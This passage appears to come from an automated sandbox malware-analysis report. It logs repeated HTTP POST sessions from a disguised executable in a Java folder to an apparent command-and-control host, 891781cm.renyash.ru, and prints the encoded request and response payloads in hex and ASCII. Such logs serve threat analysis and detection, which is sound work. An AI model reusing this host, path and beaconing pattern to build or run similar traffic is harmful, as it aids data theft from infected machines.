                                                                                                                  Jan 1, 2025 15:03:49.775430918 CET1072OUTData Raw: 50 56 5d 53 5a 56 54 59 55 5a 54 59 51 52 55 50 58 52 5c 5c 59 51 52 52 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PV]SZVTYUZTYQRUPXR\\YQRR][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(Y1Z ;&&9]=.'0"97$^0?3,-7== )<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:49.861390114 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:50.114057064 CET813INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=s%2B6m1MQRzfTWbtopnJ7%2BAqslPwKPEbAKxEc%2FNvDYjHItw3hC%2BnKq%2BxHg6BUu%2BJHn8mhajAdrqcaqT0q43xJPyxBo7PGFScErpKvD2GI7vZi9vEgB2k7H%2Biak1oat2kuCbZZqgsP0"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e145b47330c-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2728&min_rtt=1979&rtt_var=2241&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=183049&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  138192.168.2.450145104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:50.250601053 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:50.603333950 CET1072OUTData Raw: 50 55 58 53 5a 58 51 5c 55 5a 54 59 51 5e 55 53 58 58 5c 5b 59 51 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PUXSZXQ\UZTYQ^USXX\[YQR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ <?-!;12X)Z(>$W:,\'?"P3? />'+X?*#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:50.725178957 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:50.939637899 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:50.981297016 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:50 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=51JQNjhQGsYdP9y4cawZg1g9NKgK2Qc%2BoVtUV90uvZyO9h4V5dQ3NicIHyjfZ%2FCjIlxI2Ur4zQmnR5vCA%2BwfZhyyQzc8fThGYi0R%2BpFMLQFgkybzOt%2BaJYV3zswr68OFgk09qkha"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e19bb357ce4-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=7677&min_rtt=6638&rtt_var=4568&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=97619&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a
                                                                                                                  Data Ascii: 41V[X
                                                                                                                  Jan 1, 2025 15:03:51.068701029 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  139192.168.2.450146104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:51.700609922 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:52.057024002 CET1072OUTData Raw: 55 55 58 54 5a 5e 54 5e 55 5a 54 59 51 5c 55 54 58 59 5c 58 59 5c 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UUXTZ^T^UZTYQ\UTXY\XY\R\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ ??.4:$.*-/['B::;35$Z#8-#(>$(,#^!'^)
                                                                                                                  Jan 1, 2025 15:03:52.176105976 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:52.571722031 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=atA8Uqinr7upNb6ZxIf2KRvxhrBYM4joX%2Frx1iVLk%2F90gBMsKE7hzW%2FBozHBodPLKAijR5N7wNxGsPSURuhWRUKRF2lxm4yg3FlM4jLSwcQSRg65qExH9w7JlMVp84ZGC0Gm28Rg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e22ce017c96-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4454&min_rtt=2173&rtt_var=5377&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=71495&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0
                                                                                                                  Jan 1, 2025 15:03:52.591917992 CET804INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:52 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=atA8Uqinr7upNb6ZxIf2KRvxhrBYM4joX%2Frx1iVLk%2F90gBMsKE7hzW%2FBozHBodPLKAijR5N7wNxGsPSURuhWRUKRF2lxm4yg3FlM4jLSwcQSRg65qExH9w7JlMVp84ZGC0Gm28Rg"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e22ce017c96-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4454&min_rtt=2173&rtt_var=5377&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=71495&cwnd=172&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  140192.168.2.450147104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:52.699769974 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:53.056385994 CET1072OUTData Raw: 55 54 58 54 5f 5b 51 59 55 5a 54 59 51 5c 55 55 58 53 5c 5b 59 57 52 5e 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UTXT_[QYUZTYQ\UUXS\[YWR^][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(Y14;&2Y)#Y$'1:+$>''^;>\=.V(<#^!'^)
                                                                                                                  Jan 1, 2025 15:03:53.306394100 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:53.589286089 CET810INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:53 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Nv1BP1w00ugxZ3Jp52ZF7U7zTyS0yA0sk%2BDO01y%2BIZO%2Bgi%2Bev4I0jlJphYpHu%2BgraMz1LTlTkokAYhnRY9BhHmsrEilaUqA0uNkchHuqBCX2S9kojlKZgkDCl42hU%2FkR2Z0PUYj1"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e29d91f4302-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=8059&min_rtt=6591&rtt_var=5409&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=79598&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  141192.168.2.450148104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:53.713443041 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:54.072056055 CET1072OUTData Raw: 55 57 5d 53 5f 5d 51 59 55 5a 54 59 51 5e 55 50 58 59 5c 55 59 5d 52 59 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UW]S_]QYUZTYQ^UPXY\UY]RY][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#(/=X Z$>[=>'9.40.$Z,87<(=<#^!'^)3
                                                                                                                  Jan 1, 2025 15:03:54.277213097 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:54.538604975 CET802INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:54 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9A50gFz4OKOpy0G%2FkjRsyUTYtrgPUbqfGLDNRqFCWPDdtsaejxFuXhqChOSmNdDRcVIPC%2FPChGoYysAZGg2elTpkGA0kpNB0ch9jZsqBokqDVnwHuGAC9ljZYZmcmymegiLUwwX"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e2ff96c8cda-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4856&min_rtt=2023&rtt_var=6424&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1416&delivery_rate=59140&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  142192.168.2.450149104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:54.672470093 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  143192.168.2.450150104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:54.736490011 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1796
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:55.087687016 CET1796OUTData Raw: 50 56 58 50 5a 59 51 5a 55 5a 54 59 51 52 55 57 58 5d 5c 54 59 57 52 5c 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: PVXPZYQZUZTYQRUWX]\TYWR\][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#+/& (%Y%-5X=>40$=,4+$-'?3_/,?.7>#^!'^)
                                                                                                                  Jan 1, 2025 15:03:55.181049109 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:55.409064054 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:55.426397085 CET951INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dJ6cqIjjPx1kb4Y3uFpOvU%2FmYeLsXb8f3LuwUGd56VX0TWkryBYgtjJBPRNnp4VFUuoFEx2fvZo7NmI%2FZ3ZtjjsBkS1wXaDZodCyz7f2yYoekeRFfP5ergBqohejYgETjk5YaapL"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e359aa97289-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1928&min_rtt=1926&rtt_var=724&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2140&delivery_rate=758047&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 39 38 0d 0a 03 1e 22 55 27 5d 27 58 29 2d 29 01 2f 11 2f 12 25 3f 04 15 33 30 30 5a 31 07 2a 00 2f 38 37 05 3f 2b 20 01 26 3a 2d 12 23 0f 2e 5c 26 0c 2e 5d 04 1d 26 02 3e 04 3e 59 3f 3f 25 5b 3e 54 28 58 27 09 2f 5b 24 27 24 5d 24 2d 29 05 21 21 3c 0b 27 55 2f 0b 3f 07 23 5f 33 2e 3e 12 21 2a 2e 57 0d 12 22 50 31 2e 1b 53 28 21 24 10 36 02 27 1e 25 2f 01 54 27 2f 30 1f 23 01 3e 1d 3d 06 33 04 36 34 35 56 30 3a 0d 5f 22 00 25 58 23 33 22 54 20 03 2f 54 05 3d 56 4f 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 98"U']'X)-)//%?300Z1*/87?+ &:-#.\&.]&>>Y??%[>T(X'/[$'$]$-)!!<'U/?#_3.>!*.W"P1.S(!$6'%/T'/0#>=3645V0:_"%X#3"T /T=VO0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  144192.168.2.450151104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:54.855104923 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1064
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
                                                                                                                  Jan 1, 2025 15:03:55.212651968 CET1064OUTData Raw: 55 53 5d 56 5f 5a 51 54 55 5a 54 59 51 5b 55 53 58 5a 5c 59 59 57 52 5b 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: US]V_ZQTUZTYQ[USXZ\YYWR[][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\ Y+78:&.%)>#^34:3!0$/='(-8R><#^!'^)?
                                                                                                                  Jan 1, 2025 15:03:55.408616066 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:55.519613981 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:55.572350979 CET803INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:55 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SgMVtdlt80TAGHvCP2ulLqtVL5lZB81PmTMprWYHgqJppTvG7FuMBQd04IC3icgXjyMjXwbJV20XxRjyUMCuvhAJiRMNRp2NM2cukoZduUcmZg2%2BjvhwrCJI1S7Ii%2FSTVDbyDn7k"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e365dd37cf0-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2040&min_rtt=1866&rtt_var=1048&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1408&delivery_rate=447852&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  145192.168.2.450152104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:55.703027964 CET320OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Jan 1, 2025 15:03:56.058305979 CET1072OUTData Raw: 55 56 58 51 5a 58 51 58 55 5a 54 59 51 5a 55 55 58 5e 5c 5e 59 57 52 53 5d 5b 43 5b 53 59 56 5a 47 5e 55 53 5d 5f 57 53 5d 50 51 5e 5d 54 51 58 52 51 5f 58 43 5b 54 5a 56 5e 56 5c 51 57 56 55 5a 56 5d 5b 5d 41 5a 58 5a 5c 5d 5a 5c 53 59 5f 59 52
                                                                                                                  Data Ascii: UVXQZXQXUZTYQZUUX^\^YWRS][C[SYVZG^US]_WS]PQ^]TQXRQ_XC[TZV^V\QWVUZV][]AZXZ\]Z\SY_YRZVS\YXZ[XQ]\QU[[XTXZCUQW[VY]\P\^PPZ_Z\][TTR^Z_ZU_TY]YS\[^\ZDXZZXV[PUPGCQ\PS[YRCUZEY[QUPFU_V^T[CPZ[__S\#<4-%>1>=7Y'%,4<]%/3//?.4T=,#^!'^)#
                                                                                                                  Jan 1, 2025 15:03:56.147584915 CET25INHTTP/1.1 100 Continue
                                                                                                                  Jan 1, 2025 15:03:56.421130896 CET811INHTTP/1.1 200 OK
                                                                                                                  Date: Wed, 01 Jan 2025 14:03:56 GMT
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Transfer-Encoding: chunked
                                                                                                                  Connection: keep-alive
                                                                                                                  cf-cache-status: DYNAMIC
                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zPMkN1MUwNmjDmptUabkzEtk5oXDAY%2FKt5yyJQt4LJt7keWLpFGvnpoBN6Lcofzfqn%2FU%2BW6%2BME4xS3ujt1m%2FViMeF504kZb7MBRDN8PuToPQVO2DNXJ0KeclMcDyVFwt2ujWm%2BJA"}],"group":"cf-nel","max_age":604800}
                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                  Server: cloudflare
                                                                                                                  CF-RAY: 8fb30e3bae917ca5-EWR
                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2283&min_rtt=1911&rtt_var=1461&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1392&delivery_rate=298629&cwnd=242&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                  Data Raw: 34 0d 0a 31 56 5b 58 0d 0a 30 0d 0a 0d 0a
                                                                                                                  Data Ascii: 41V[X0


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  146192.168.2.450153104.21.38.84807448C:\Program Files (x86)\Java\jre-1.8\lib\aXnWbWpBWYJmkhPMHrrUNM.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Jan 1, 2025 15:03:56.544367075 CET344OUTPOST /ProcessorServerdefaultsqltrafficuniversalwpprivate.php HTTP/1.1
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                                                                                  Host: 891781cm.renyash.ru
                                                                                                                  Content-Length: 1072
                                                                                                                  Expect: 100-continue
                                                                                                                  Connection: Keep-Alive
